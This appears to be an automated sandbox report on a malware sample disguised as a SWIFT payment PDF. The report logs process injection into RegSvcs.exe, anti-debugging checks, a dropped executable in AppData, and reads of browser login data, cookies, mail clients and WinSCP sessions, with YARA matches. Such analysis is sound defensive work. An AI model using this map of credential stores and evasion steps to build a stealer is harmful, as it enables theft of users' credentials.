              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598797Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597483Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596045Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595827Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595715Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595171Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: RegSvcs.exe, 00000001.00000002.4161341051.00000000055C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_03F232E8 mov eax, dword ptr fs:[00000030h]0_2_03F232E8
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_03F249C8 mov eax, dword ptr fs:[00000030h]0_2_03F249C8
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_03F24968 mov eax, dword ptr fs:[00000030h]0_2_03F24968
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040E61C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00416F6A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004123F1 SetUnhandledExceptionFilter,1_2_004123F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8E5008Jump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe"Jump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
              Source: RegSvcs.exe, 00000001.00000002.4156259862.0000000002CD4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeBinary or memory string: Shell_TrayWnd
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,1_2_00417A20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0042039F
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.280fe06.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.3cd5390.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.3cd5390.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2810cee.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.280fe06.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2810cee.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2be0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4156259862.0000000002CD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6584, type: MEMORYSTR
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.280fe06.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.3cd5390.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.3cd5390.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2810cee.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.280fe06.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2810cee.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2be0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeBinary or memory string: WIN_XP
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeBinary or memory string: WIN_XPe
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeBinary or memory string: WIN_VISTA
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeBinary or memory string: WIN_7
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.280fe06.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.3cd5390.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.3cd5390.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2810cee.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.280fe06.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2810cee.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2be0000.5.unpack, type: UNPACKEDPE
